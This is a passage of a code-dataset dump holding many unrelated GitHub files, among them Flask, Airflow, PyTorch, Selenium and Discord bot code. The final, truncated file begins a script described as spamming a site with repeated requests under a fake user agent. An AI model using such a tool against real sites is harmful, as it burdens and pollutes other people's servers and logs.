losses,iters\n","repo_name":"submarinecantfly/sgd","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":4052,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"7"}
+{"seq_id":"17767866030","text":"from flask import Flask, request, jsonify\n\napp = Flask(__name__)\n\n@app.route('/upload', methods=['POST'])\ndef handle_upload():\n    file = request.files['file']\n    # parse and preprocess file data\n    data = process_data(file)\n    return jsonify(data)\n\ndef process_data(file):\n    # read and parse file contents\n    raw = file.read().decode('utf-8')\n    # clean and transform data\n    data = [line.strip() for line in raw.splitlines() if line.strip()]\n    return data\n\nif __name__ == '__main__':\n    app.run()\n","repo_name":"LorisGr/DATA_VISUALIZATIONS_tool","sub_path":"backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"32378563365","text":"from .db import db, environment, SCHEMA, add_prefix_for_prod\n\nclass Game(db.Model):\n\n    __tablename__ = 'games'\n\n    if environment == 'production':\n        __table_args__ = {'schema': SCHEMA}\n\n    id = db.Column(db.Integer, primary_key=True)\n    name = db.Column(db.Text, nullable=False)\n\n    def to_dict(self):\n        return {\n            \"id\": self.id,\n            \"name\": self.name\n        }","repo_name":"MichaelLacey/Esportscenter_Clone","sub_path":"app/models/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"9875890380","text":"from datetime import time\nimport pandas as pd\n\nfrom knmy import knmy\nimport constants\n\n\ndef load_data_temp(stationnumber, startdate, enddate):\n    \"\"\"\n    With knmy.get_hourly_data, a temperature dataset for the chosen period is retrieved\n    via the station number, a start date and an end date (YYYYMMDDHH), using the variable TEMP.\n    In the retrieved dataset, date and time are split over two columns and stored in the wrong\n    format. The code below merges them into one column in the format YYYY-MM-DD HH.\n    Column names are renamed; the temperature is given with one decimal and no separator.\n    Columns with data that are not needed are dropped.\n    \"\"\"\n    df = knmy.get_hourly_data(stations=[stationnumber],\n                              start=startdate,\n                              end=enddate,\n                              variables=['TEMP'],\n                              parse=True)[3:]\n    df = pd.DataFrame(df[0])\n\n    df[\"YYYYMMDD\"] = pd.to_datetime(df[\"YYYYMMDD\"], format='%Y%m%d')\n    df[\"YYYYMMDD\"] += pd.to_timedelta(df[\"H\"], unit='h')\n    df.rename(columns={'YYYYMMDD': 'tijdstempel', \"T\": \"t\"}, inplace=True)\n    df[\"t\"] = df[\"t\"] * 0.1\n    df.drop(columns=['STN', 'H', 'TD', 'T10N'], inplace=True, axis=1)\n    df.set_index(\"tijdstempel\", inplace=True)\n\n    return df\n\n\ndef set_temp(df, start_time, end_time):\n    \"\"\"\n    Set the user's indoor temperature over the period. You can choose between keeping\n    a constant temperature or using a night setback.\n    \"\"\"\n    df['t_in'] = constants.t_in_nacht\n    mask = df.between_time(time(start_time), time(end_time - 1))\n    df.loc[mask.index, 't_in'] = constants.t_in\n\n    df['t_adj'] = df['t_in']\n    df['t_average'] = df['t'].mean()\n\n    df['t_out_corr'] = df['t'] + (0.016\n                                  * constants.tauw\n                                  * 0.8)\n    df['t_corr1'] = constants.t_corr1\n    df['t_corr2'] = constants.t_corr2\n\n    return df\n","repo_name":"robinvp1901/HU_LE1_C_sim_heatpump","sub_path":"temp/temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"27116993456","text":"from login_page import LoginPage\r\n\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.wait import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.chrome.service import Service as ChromeService\r\nfrom webdriver_manager.chrome import ChromeDriverManager\r\n\r\n\r\nclass Test1:\r\n    driver = webdriver.Chrome(service=ChromeService(ChromeDriverManager().install()))\r\n    problem_users = []\r\n\r\n    # Check title 'Products'\r\n    def check_title(self):\r\n        products_title = WebDriverWait(self.driver, 5).until(\r\n            EC.element_to_be_clickable((By.XPATH, \"//span[@class='title']\")))\r\n        products_title_text = products_title.text\r\n        # Assert title's text\r\n        assert products_title_text == 'Products', 'Different titles!'\r\n        print('Login SUCCESS!')\r\n        print('Headings match!')\r\n\r\n    # LogOut\r\n    def log_out(self):\r\n        button_burger_menu = self.driver.find_element(By.ID, 'react-burger-menu-btn')\r\n        button_burger_menu.click()\r\n        logout_burger_menu = WebDriverWait(self.driver, 2).until(\r\n            EC.element_to_be_clickable((By.ID, \"logout_sidebar_link\")))\r\n        logout_burger_menu.click()\r\n\r\n    def test_login(self):\r\n        base_url = 'https://www.saucedemo.com/'\r\n        logins = ['standard_user', 'problem_user', 'locked_out_user', 'performance_glitch_user']\r\n        password_all = 'secret_sauce'\r\n\r\n        self.driver.get(base_url)\r\n        self.driver.maximize_window()\r\n\r\n        print('++++++++++++++++ Start Test_1 ++++++++++++++++\\n')\r\n\r\n        login_page = LoginPage(self.driver)\r\n\r\n        for login in logins:\r\n            # Authorization\r\n            print(f'****************Test login \"{login}\" - STARTED!****************')\r\n            
login_page.authorization(login, password_all)\r\n\r\n try:\r\n self.check_title()\r\n self.log_out()\r\n except:\r\n print(f'!!!!!!!!- User with login \"{login}\" isn\\'t authorized -!!!!!!!!')\r\n self.problem_users.append(login)\r\n self.driver.refresh()\r\n\r\n print(f'****************Test login \"{login}\" - FINISHED!****************\\n')\r\n\r\n if self.problem_users:\r\n print(\r\n '!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! Test_1 partially successful !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')\r\n print(f'There are problems with user/users: {self.problem_users}')\r\n else:\r\n print('Test_1 Success!')\r\n print('++++++++++++++++ FINISH Test_1 ++++++++++++++++\\n')\r\n\r\n\r\ntest = Test1()\r\ntest.test_login()\r\n","repo_name":"DmitryVS-git/alex_selenium_course","sub_path":"Alex_selenium_course_basics/tasks/task_4/task_4_authorization_oop.py","file_name":"task_4_authorization_oop.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"12130435721","text":"def SeatingStudents(arr):\n # Extract the total number of seats (K) from the first element of the input array\n K = int(arr[0])\n\n # Extract the list of reserved seats from the remaining elements of the input array\n reserved = [int(n) for n in arr[1:]]\n\n # If the number of reserved seats is equal to the total number of seats (K),\n # there are no available seats for students, so return 0.\n if len(reserved) == K:\n return 0\n\n # Initialize a variable to count the valid seating combinations\n combinations = 0\n\n # Loop through each seat from 1 to K\n for i in range(1, K + 1):\n # Skip the seat if it is reserved\n if i in reserved:\n continue\n\n # Calculate neighboring seats based on whether the seat number is even or odd\n if i % 2 != 0: # If the seat number is odd\n neighboring = [i - 2, i + 1, i + 2] # Neighboring seats are two seats back and one and two seats forward\n else: # If the seat number is even\n neighboring = [i - 2, i - 1,\n i + 2] # Neighboring seats are two seats back, one seat back, and two seats forward\n\n # Check if each neighboring seat is valid (within the range 1 to K) and not reserved\n for j in neighboring:\n if j < 1 or K < j or j in reserved:\n continue\n combinations += 1 # Increment the combinations count for each valid neighboring seat\n\n # The total number of combinations counted includes symmetric combinations where seats\n # have been swapped (e.g., seat 1 and seat 2 are considered the same as seat 2 and seat 1).\n # So, we divide the total combinations by 2 to avoid counting symmetric combinations twice.\n return combinations // 2\n\n\n# Keep this function call here\nprint(SeatingStudents(input()))\n","repo_name":"kirillfr97/coding_challenges","sub_path":"seating_students/seating_students.py","file_name":"seating_students.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"74480429343","text":"from twilio.rest import Client\r\n\r\nimport keys\r\n\r\n\r\nclient = Client(keys.account_sid, keys.auth_token)\r\nmessage = client.messages.create(\r\n \r\n body=\"OLÀ MEU NOME È FULANO\",\r\n from_=keys.twilio_number,\r\n to=keys.target_number\r\n \r\n \r\n 
\r\n)\r\n\r\nprint(message.body)","repo_name":"madrade1472/Enviando-SMS-utilizando-Python-e-Twilio","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"70098001822","text":"import airflow\nimport os\n\nimport psycopg2\nimport time\n\nfrom airflow import DAG\nfrom airflow.operators.bash import BashOperator\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.exceptions import AirflowFailException\n\nfrom datetime import datetime, timedelta\n\nfrom pyspark.sql import SparkSession\nimport pyspark.sql.functions as f\nfrom pyspark.sql.types import StructType, StructField, StringType, IntegerType, DateType, LongType, DoubleType\n\nfrom src.conf import CREDENTIALS\nfrom loguru import logger\nfrom src.log_df import log_df\n\n### GLOBALS\nDAGNAME = 'agg_data'\n\nHOST = CREDENTIALS['host']\nPORT = CREDENTIALS['port']\nDB = CREDENTIALS['db']\nUSER = CREDENTIALS['user']\nPW = CREDENTIALS['pw']\n\n# logger\nlogger.add('/opt/airflow/logs/python_log.log')\n\nargs = {\n    'owner': 'airflow',\n    #'start_date' : datetime(2021, 11, 26),\n    #'catchup': True, \n    'provide_context': True,\n    #'retries': 5,\n    #'retry_delay': timedelta(minutes=5)\n}\n\n\n### DAGS\ndef check_db():\n    WAITING = 30\n\n    conn_string = f\"dbname='{DB}' user='{USER}' host='{HOST}' port='{PORT}' password='{PW}' connect_timeout=1 \"\n    def postgres_test(i=None):\n        # try to connect to DB\n        try:\n            conn = psycopg2.connect(conn_string)\n            conn.close()\n            if i:\n                print(f'Connections are accepted (on attempt - {i})')\n            return True\n        except:\n            if i:\n                print(f'DB does not accept connections! (try - {i})')\n            else:\n                print('DB does not accept connections!')\n            return False\n\n    # connection test\n    for i in range(10):\n        k = postgres_test(i+1)\n\n        if k:\n            #print(f'DB accepts connections! (on try {i+1})')\n            break\n\n        print(f\"Waiting for {WAITING} seconds before retry!\")\n        time.sleep(WAITING)\n    \n    if not k:\n        raise AirflowFailException(\"Database unavailable!\")\n\ndef agg_data(ds, **kwargs):\n\n    # get filename - execution date\n    filename = f'{kwargs[\"logical_date\"].date()}.csv'\n    filename_parquet = f'{kwargs[\"logical_date\"].date()}'\n\n    # create spark\n    #spark = SparkSession.builder.config(\"spark.driver.memory\", \"2G\").getOrCreate()\n    spark = SparkSession.builder\\\n        .config(\"spark.driver.memory\", \"2G\") \\\n        .config(\"spark.jars\", \"/opt/airflow/jars/postgresql-42.3.1.jar\") \\\n        .getOrCreate()\n\n\n    # schema for csv\n    schema = StructType() \\\n        .add(\"event_time\", DateType(),True) \\\n        .add(\"event_type\", StringType(),True) \\\n        .add(\"product_id\", IntegerType(),True) \\\n        .add(\"category_id\", LongType(),True) \\\n        .add(\"category_code\", StringType(),True) \\\n        .add(\"brand\", StringType(),True) \\\n        .add(\"price\", DoubleType(),True) \\\n        .add(\"user_id\", IntegerType(),True) \\\n        .add(\"user_session\", StringType(),True) \\\n        .add(\"date\", DateType(),True)\n\n    # read csv file and apply schema\n    df = spark.read.format(\"csv\") \\\n        .option(\"header\", True) \\\n        .schema(schema) \\\n        .load(f\"/data/{filename}\")\n\n    # number of views per category (date, category, views_count)\n    df_cat = df\\\n        .where(\"event_type == 'view'\")\\\n        .groupBy(\"date\", \"category_code\")\\\n        .agg(\n            f.count(\"*\").alias(\"views_count\")\n        )\n\n    # purchases of brand products (date, brand, purchase_count)\n    df_sale = df\\\n        .where(\"event_type == 'purchase'\")\\\n        .groupBy(\"date\", \"brand\")\\\n        .agg(\n            f.count(\"*\").alias(\"purchase_count\")\n        )\n\n    # log schemas and explain\n    logger.info(log_df(df_cat, \"DF_CAT\", \"explain\"))\n    logger.info(log_df(df_cat, \"DF_CAT\", \"schema\"))\n    logger.info(log_df(df_sale, \"DF_SALE\", \"explain\"))\n    logger.info(log_df(df_sale, \"DF_SALE\", \"schema\"))\n\n\n    #df.printSchema()\n    #df_cat.printSchema()\n    #df_sale.printSchema()\n\n    # save to parquet\n    df_cat.repartition(1).write.mode(\"overwrite\").format(\"parquet\").save(f\"/data/{filename_parquet}_cat.parquet\")\n    logger.info(f\"{filename_parquet}_cat.parquet HAS BEEN SAVED SUCCESSFULLY!\")\n    df_sale.repartition(1).write.mode(\"overwrite\").format(\"parquet\").save(f\"/data/{filename_parquet}_sale.parquet\")\n    logger.info(f\"{filename_parquet}_sale.parquet HAS BEEN SAVED SUCCESSFULLY!\")\n    \n    # load to PostgreSQL\n    url = f\"jdbc:postgresql://{HOST}:{PORT}/{DB}\"\n    TARGET_TABLE = \"public.category_table\"\n\n    (\n        df_cat\n        .write\n        .option(\"driver\", \"org.postgresql.Driver\")\n        .format(\"jdbc\")\n        .mode(\"append\")\n        .option(\"url\", url)\n        .option(\"user\", USER)\n        .option(\"password\", PW)\n        .option(\"dbtable\", TARGET_TABLE)\n        .option(\"fetchsize\", 10000)\n        .save(TARGET_TABLE)\n    )\n    logger.info(f\"DATA HAS BEEN UPLOADED TO {DB}!\")\n    \n\ndag = airflow.DAG(\n    DAGNAME,\n    schedule_interval='0 20 * * *',\n    start_date=datetime(2021, 11, 26),\n    catchup=True,\n    dagrun_timeout=timedelta(minutes=60),\n    #default_args=args,\n    tags=['homework'],\n    max_active_runs=1,\n)\n\ncheck_postgre = PythonOperator(task_id='check_db',\n                               python_callable=check_db,\n                               #provide_context=False,\n                               dag=dag)\n\n\ndownload_data = BashOperator(\n    task_id='download_data',\n    bash_command='cd /data; wget http://37.139.43.86/events/{{ ds }}; mv {{ ds }} {{ ds }}.csv',\n    dag=dag\n    )\n\nagg_data = PythonOperator(task_id='agg_data',\n                          python_callable=agg_data,\n                          #provide_context=False,\n                          dag=dag)\n\n\n### TASK 
QUEUE\ncheck_postgre >> download_data >> agg_data\n","repo_name":"YAKOROLEVAZAMKA/spark_course","sub_path":"airflow/dags/dag_daily.py","file_name":"dag_daily.py","file_ext":"py","file_size_in_byte":5785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"72863983582","text":"import functools\nimport os\nimport pickle  # needed for serialization in all_gather below\nimport subprocess\nimport torch\nimport torch.distributed as dist\nimport torch.multiprocessing as mp\n\n\n# ----------------------------------\n# init\n# ----------------------------------\ndef init_dist(launcher, backend='hccl', **kwargs):\n    if mp.get_start_method(allow_none=True) is None:\n        mp.set_start_method('spawn')\n    if launcher == 'pytorch':\n        _init_dist_pytorch(backend, **kwargs)\n    elif launcher == 'slurm':\n        _init_dist_slurm(backend, **kwargs)\n    else:\n        raise ValueError(f'Invalid launcher type: {launcher}')\n\n\ndef _init_dist_pytorch(backend, **kwargs):\n    rank = int(os.environ['RANK'])\n    num_gpus = torch.npu.device_count()\n    torch.npu.set_device(rank % num_gpus)\n    dist.init_process_group(backend=backend, **kwargs)\n\n\ndef _init_dist_slurm(backend, port=None):\n    \"\"\"Initialize slurm distributed training environment.\n    If argument ``port`` is not specified, then the master port will be system\n    environment variable ``MASTER_PORT``. If ``MASTER_PORT`` is not in system\n    environment variable, then a default port ``29500`` will be used.\n    Args:\n        backend (str): Backend of torch.distributed.\n        port (int, optional): Master port. Defaults to None.\n    \"\"\"\n    proc_id = int(os.environ['SLURM_PROCID'])\n    ntasks = int(os.environ['SLURM_NTASKS'])\n    node_list = os.environ['SLURM_NODELIST']\n    num_gpus = torch.npu.device_count()\n    torch.npu.set_device(proc_id % num_gpus)\n    addr = subprocess.getoutput(\n        f'scontrol show hostname {node_list} | head -n1')\n    # specify master port\n    if port is not None:\n        os.environ['MASTER_PORT'] = str(port)\n    elif 'MASTER_PORT' in os.environ:\n        pass  # use MASTER_PORT in the environment variable\n    else:\n        # 29500 is torch.distributed default port\n        os.environ['MASTER_PORT'] = '29500'\n    os.environ['MASTER_ADDR'] = addr\n    os.environ['WORLD_SIZE'] = str(ntasks)\n    os.environ['LOCAL_RANK'] = str(proc_id % num_gpus)\n    os.environ['RANK'] = str(proc_id)\n    dist.init_process_group(backend=backend)\n\n\n\n# ----------------------------------\n# get rank and world_size\n# ----------------------------------\ndef get_dist_info():\n    if dist.is_available():\n        initialized = dist.is_initialized()\n    else:\n        initialized = False\n    if initialized:\n        rank = dist.get_rank()\n        world_size = dist.get_world_size()\n    else:\n        rank = 0\n        world_size = 1\n    return rank, world_size\n\n\ndef get_rank():\n    if not dist.is_available():\n        return 0\n\n    if not dist.is_initialized():\n        return 0\n\n    return dist.get_rank()\n\n\ndef get_world_size():\n    if not dist.is_available():\n        return 1\n\n    if not dist.is_initialized():\n        return 1\n\n    return dist.get_world_size()\n\n\ndef master_only(func):\n\n    @functools.wraps(func)\n    def wrapper(*args, **kwargs):\n        rank, _ = get_dist_info()\n        if rank == 0:\n            return func(*args, **kwargs)\n\n    return wrapper\n\n\n# ----------------------------------\n# operation across ranks\n# ----------------------------------\ndef reduce_sum(tensor):\n    if not dist.is_available():\n        return tensor\n\n    if not dist.is_initialized():\n        return tensor\n\n    tensor = tensor.clone()\n    dist.all_reduce(tensor, op=dist.ReduceOp.SUM)\n\n    return tensor\n\n\ndef gather_grad(params):\n    world_size = get_world_size()\n\n    if world_size == 1:\n        return\n\n    for param in params:\n        if param.grad is not None:\n            dist.all_reduce(param.grad.data, op=dist.ReduceOp.SUM)\n            param.grad.data.div_(world_size)\n\n\ndef all_gather(data):\n    world_size = get_world_size()\n\n    if world_size == 1:\n        return [data]\n\n    buffer = pickle.dumps(data)\n    storage = torch.ByteStorage.from_buffer(buffer)\n    tensor = torch.ByteTensor(storage).to('npu')\n\n    local_size = torch.IntTensor([tensor.numel()]).to('npu')\n    size_list = [torch.IntTensor([0]).to('npu') for _ in range(world_size)]\n    dist.all_gather(size_list, local_size)\n    size_list = [int(size.item()) for size in size_list]\n    max_size = max(size_list)\n\n    tensor_list = []\n    for _ in size_list:\n        tensor_list.append(torch.ByteTensor(size=(max_size,)).to('npu'))\n\n    if local_size != max_size:\n        padding = torch.ByteTensor(size=(max_size - local_size,)).to('npu')  # padding must live on the same device as tensor before cat\n        tensor = torch.cat((tensor, padding), 0)\n\n    dist.all_gather(tensor_list, tensor)\n\n    data_list = []\n\n    for size, tensor in zip(size_list, tensor_list):\n        buffer = tensor.cpu().numpy().tobytes()[:size]\n        data_list.append(pickle.loads(buffer))\n\n    return data_list\n\n\ndef reduce_loss_dict(loss_dict):\n    world_size = get_world_size()\n\n    if world_size < 2:\n        return loss_dict\n\n    with torch.no_grad():\n        keys = []\n        losses = []\n\n        for k in sorted(loss_dict.keys()):\n            keys.append(k)\n            losses.append(loss_dict[k])\n\n        losses = torch.stack(losses, 0)\n        dist.reduce(losses, dst=0)\n\n        if dist.get_rank() == 0:\n            losses /= world_size\n\n        reduced_losses = {k: v for k, v in zip(keys, losses)}\n\n    return reduced_losses\n\n","repo_name":"Ascend/ModelZoo-PyTorch","sub_path":"PyTorch/contrib/cv/others/SwinIR/utils/utils_dist.py","file_name":"utils_dist.py","file_ext":"py","file_size_in_byte":5163,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"7"}
+{"seq_id":"28303173074","text":"\"\"\"\n    Exercise:\n    Use a process pool to back up a directory that contains several regular files.\n    Hints:\n        os.listdir() lists all files in a directory\n        os.path.getsize() returns the size of a file\n        os.mkdir() creates a directory\n    Requirements:\n        Copy at least 4 files at the same time while creating only 4 processes, i.e. use Pool(4)\n        Event: copying one file is one event\n\n    Advanced version: print the copy progress in real time, 0% -- 100%\n    Keep fetching the number of bytes already copied, flush(),\n    then: bytes copied / source size * 100%\n\"\"\"\n\nfrom multiprocessing import Pool, Queue\nimport os\n\nq = Queue(3)\n\n\n# copy a single file\n# what to copy, where from, where to\ndef copy_file(file, old_dir, new_dir):\n    fr = open(old_dir+\"/\"+file, \"rb\")\n    fw = open(new_dir+\"/\"+file, \"wb\")\n    while True:\n        data = fr.read(1024*10)\n        if not data:\n            break\n        n = fw.write(data)\n        q.put(n)  # push the number of bytes written onto the message queue\n    fr.close()\n    fw.close()\n\ndef main():\n    \"\"\"\n    Create the process pool and call the file-copy function as the event\n    \"\"\"\n    base_path = \"/home/tarena/\"  # base directory\n    dir = input(\"Dir:\")  # directory to back up\n    old_dir = base_path + dir  # full path of the directory to back up\n    new_dir = old_dir + \"-backup\"  # copy to here\n    os.mkdir(new_dir)  # create the destination directory\n    file_list = os.listdir(old_dir)  # these are the files to copy\n\n    # get the total size of the directory\n    total_size = 0\n    for i in file_list:\n        total_size += os.path.getsize(old_dir+\"/\"+i)\n\n\n    # create the process pool\n    pool = Pool(4)\n    for file in file_list:\n        pool.apply_async(copy_file, args=(file, old_dir, new_dir))\n\n    pool.close()\n\n\n    print(\"Directory size: %.2fM\" % (total_size/1024/1024))\n    copy_size = 0  # number of bytes copied so far\n    while copy_size < total_size:\n        copy_size += q.get()\n        print(\"Copied %.1f%%\" % (copy_size/total_size*100))\n\n    pool.join()\n\n\nif __name__ == '__main__':\n    main()\n\n\n# from multiprocessing import Pool\n# import os\n#\n#\n#\n# file_addr = \"/home/tarena/hello/\"\n# file_num = os.listdir(file_addr)\n# # print(file_num)   ['b.txt', 'e.txt', 'd.txt', 'c.txt', 'a.sql', 'f.txt']\n# os.mkdir(\"copy_file\")\n#\n#\n# def 
copy_1_file(file_name):\n# fr = open(file_addr+file_name, \"rb\")\n# fw = open(\"copy_file\"+file_name, \"wb\")\n# fw.write(fr.read())\n# fr.close()\n# fw.close()\n#\n#\n#\n#\n# pool = Pool(4)\n#\n#\n# for i in range(4):\n#\n# pool.apply_async(func=copy_1_file, args=(file_name, ))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"nandadao/Python_note","sub_path":"note/my_note/second_month/day07/pool_copy.py","file_name":"pool_copy.py","file_ext":"py","file_size_in_byte":2601,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"37122572196","text":"import discord\n\nfrom typing import Union\nfrom data.model.case import Case\nfrom data.model.guild import Guild\nfrom data.services.guild_service import guild_service\nfrom data.services.user_service import user_service\nfrom utils.context import ChromeyContext\nfrom utils.mod.mod_logs import prepare_ban_log, prepare_kick_log\n\nfrom utils.config import cfg\n\n\nasync def add_kick_case(ctx: ChromeyContext, user, reason, db_guild):\n \"\"\"Adds kick case to user\n\n Parameters\n ----------\n ctx : ChromeyContext\n \"Bot context\"\n user : discord.Member\n \"Member who was kicked\"\n reason : str\n \"Reason member was kicked\"\n db_guild\n \"Guild DB\"\n\n \"\"\"\n # prepare case for DB\n case = Case(\n _id=db_guild.case_id,\n _type=\"KICK\",\n mod_id=ctx.author.id,\n mod_tag=str(ctx.author),\n reason=reason,\n )\n\n # increment max case ID for next case\n guild_service.inc_caseid()\n # add new case to DB\n user_service.add_case(user.id, case)\n\n return prepare_kick_log(ctx.author, user, case)\n\n\nasync def notify_user(user, text, log):\n \"\"\"Notifies a specified user about something\n\n Parameters\n ----------\n user : discord.Member\n \"User to notify\"\n text : str\n \"Text to send\"\n log : discord.Embed\n \"Embed to send\"\n \"\"\"\n try:\n await user.send(text, embed=log)\n except Exception:\n db_guild = guild_service.get_guild()\n channel = user.guild.get_channel(db_guild.channel_offtopic)\n if channel is None:\n return\n await channel.send(f\"{user.mention}, I tried to DM you this but your DMs are closed!\\n{text}\", embed=log)\n\n return True\n\n\nasync def notify_user_warn(ctx: ChromeyContext, user: discord.User, log):\n \"\"\"Notifies a specified user about a warn\n\n Parameters\n ----------\n ctx : ChromeyContext\n \"Bot context\"\n user : discord.Member\n \"User to notify\"\n log : discord.Embed\n \"Embed to send\"\n \"\"\"\n\n if isinstance(user, discord.Member):\n # await notify_user(user, f\"You were warned in {ctx.guild.name}.\", log)\n try:\n await user.send(f\"You were warned in {ctx.guild.name}.\", embed=log)\n except Exception:\n db_guild = guild_service.get_guild()\n channel = user.guild.get_channel(db_guild.channel_offtopic)\n if channel is None:\n return\n await channel.send(f\"{user.mention}, I tried to DM you this but your DMs are closed!\\nYou were warned in {ctx.guild.name}.\", embed=log)\n\n\nasync def submit_mod_log(ctx: ChromeyContext, db_guild: Guild, user: Union[discord.Member, discord.User], log):\n \"\"\"Submits a public log\n\n Parameters\n ----------\n ctx : ChromeyContext\n \"Bot context\"\n user : discord.Member\n \"User to notify\"\n db_user\n \"User DB\"\n db_guild\n \"Guild DB\"\n log : discord.Embed\n \"Embed to send\"\n \"\"\"\n modlogs_chan = ctx.guild.get_channel(\n db_guild.channel_modlogs)\n if modlogs_chan:\n log.remove_author()\n log.set_thumbnail(url=user.display_avatar)\n await modlogs_chan.send(embed=log)\n\n\nasync def 
async def add_ban_case(ctx: ChromeyContext, user: discord.User, reason, db_guild: Guild = None):\n \"\"\"Adds ban case to user\n\n Parameters\n ----------\n ctx : ChromeyContext\n \"Bot context\"\n user : discord.Member\n \"Member who was banned\"\n reason : str\n \"Reason member was banned\"\n db_guild\n \"Guild DB\"\n\n \"\"\"\n # prepare the case to store in DB\n case = Case(\n _id=db_guild.case_id,\n _type=\"BAN\",\n mod_id=ctx.author.id,\n mod_tag=str(ctx.author),\n punishment=\"PERMANENT\",\n reason=reason,\n )\n\n # increment DB's max case ID for next case\n guild_service.inc_caseid()\n # add case to db\n user_service.add_case(user.id, case)\n # prepare log embed to send to #public-mod-logs, user and context\n return prepare_ban_log(ctx.author, user, case)\n","repo_name":"DiscordGIR/ChromeyRewrite","sub_path":"utils/mod/modactions_helpers.py","file_name":"modactions_helpers.py","file_ext":"py","file_size_in_byte":4021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"42897948397","text":"import unittest\n\nimport aoc\nimport day22\n\n\nclass TestDay22(unittest.TestCase):\n\n def test_deal_into_new_stack(self):\n techniques = [\n \"deal into new stack\"\n ]\n deck = day22.DeckOfSpaceCards(10)\n deck.shuffle(techniques)\n cards = deck.get_all_cards()\n self.assertEqual(list(map(int, \"9 8 7 6 5 4 3 2 1 0\".split())), cards)\n\n def test_cut_n(self):\n techniques = [\n \"cut 3\"\n ]\n deck = day22.DeckOfSpaceCards(10)\n deck.shuffle(techniques)\n cards = deck.get_all_cards()\n self.assertEqual(list(map(int, \"3 4 5 6 7 8 9 0 1 2\".split())), cards)\n\n def test_cut_n_negative(self):\n techniques = [\n \"cut -4\"\n ]\n deck = day22.DeckOfSpaceCards(10)\n deck.shuffle(techniques)\n cards = deck.get_all_cards()\n self.assertEqual(list(map(int, \"6 7 8 9 0 1 2 3 4 5\".split())), cards)\n\n def test_deal_with_increment(self):\n techniques = [\n \"deal with increment 3\"\n ]\n deck = day22.DeckOfSpaceCards(10)\n deck.shuffle(techniques)\n cards = deck.get_all_cards()\n self.assertEqual(list(map(int, \"0 7 4 1 8 5 2 9 6 3\".split())), cards)\n\n def test_part1_example1(self):\n techniques = [\n \"deal with increment 7\",\n \"deal into new stack\",\n \"deal into new stack\",\n ]\n expected = \"0 3 6 9 2 5 8 1 4 7\"\n deck = day22.DeckOfSpaceCards(10)\n deck.shuffle(techniques)\n cards = deck.get_all_cards()\n self.assertEqual(list(map(int, expected.split())), cards)\n\n def test_part2_example2(self):\n techniques = [\n \"cut 6\",\n \"deal with increment 7\",\n \"deal into new stack\",\n ]\n expected = \"3 0 7 4 1 8 5 2 9 6\"\n deck = day22.DeckOfSpaceCards(10)\n deck.shuffle(techniques)\n cards = deck.get_all_cards()\n self.assertEqual(list(map(int, expected.split())), cards)\n\n def test_part2_example3(self):\n techniques = [\n \"deal with increment 7\",\n \"deal with increment 9\",\n \"cut -2\",\n ]\n expected = \"6 3 0 7 4 1 8 5 2 9\"\n deck = day22.DeckOfSpaceCards(10)\n deck.shuffle(techniques)\n cards = deck.get_all_cards()\n self.assertEqual(list(map(int, expected.split())), cards)\n\n def test_part2_example4(self):\n techniques = [\n \"deal into new stack\",\n \"cut -2\",\n \"deal with increment 7\",\n \"cut 8\",\n \"cut -4\",\n \"deal with increment 7\",\n \"cut 3\",\n \"deal with increment 9\",\n \"deal with increment 3\",\n \"cut -1\",\n ]\n expected = \"9 2 5 8 1 4 7 0 3 6\"\n deck = day22.DeckOfSpaceCards(10)\n deck.shuffle(techniques)\n cards = deck.get_all_cards()\n self.assertEqual(list(map(int, expected.split())), cards)\n\n def test_part1_input(self):\n result = day22.part1(aoc.read_input('day22.input'))\n self.assertEqual(6326, result)\n\n @unittest.skip\n def test_part2_input(self):\n result = day22.part2(aoc.read_input('day22.input'))\n self.assertEqual(40522432670594, result)\n\n\nif __name__ == '__main__':\n unittest.main()\n
","repo_name":"zhatt/adventofcode2019","sub_path":"test_day22.py","file_name":"test_day22.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"7621040822","text":"import argparse,time\nfrom pyvirtualdisplay import Display\nfrom selenium import webdriver\nfrom selenium.webdriver import Firefox\nfrom selenium.webdriver.firefox.options import Options\nfrom selenium.webdriver.firefox.firefox_profile import FirefoxProfile\n \nparser = argparse.ArgumentParser(description='Reciosbot Will Spam your site introducing funny user agent in logs')\nparser.add_argument('--url', type=str, nargs='?', help='URL to be called')\nparser.add_argument('--user_agent', nargs='?', help='Funny user agent to be used',default='ReciosBot/Doing_My_Part')\nparser.add_argument('--requests', type=int, nargs='?', help='Number of requests to be done', default=5)\nparser.add_argument('--interval', type=float, nargs='?', help='Interval in seconds between requests', default=0.5)\ninputArgs = parser.parse_args()\n\n# Some info about 